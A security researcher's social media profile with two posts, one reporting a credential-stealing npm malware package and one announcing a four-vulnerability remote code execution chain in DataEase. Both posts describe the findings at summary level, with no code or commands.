Moshe Siman Tov Bustan (@MosheTov)
@MosheTov
Security Research Team Lead @OX__Security
Guitars @CompileBand
23x CVEs
3x Conference Talks
485 正在关注 868 粉丝
🚨 NPM Malware-slop Alert!🚨
We detected and reported a malware-slop package to npm - the malware uses it's OWN PRIVATE GitHub token, which is EMBEDDED INSIDE the malware itself - to read sensitive information and upload it to the threat actor's GitHub repository.
The malware is still live on npm -
The threat actor's GitHub page was opened 5h ago -
Detailed report will be published tomorrow.
显示更多
4-Vulnerability Exploit Chain in DataEase
My team found a 4-vulnerability exploit chain allowing unauthenticated RCE on DataEase.
Combined with a previously published vulnerability (CVE-2026-23958) - these new vulns complete the attack chain, bypassing JDBC, SQL Injection and a Quartz scheduler injection that runs periodically and executes a crafted payload on the machine.
We have also a video showing the exploit POC in action :)
Read the full blog:
显示更多
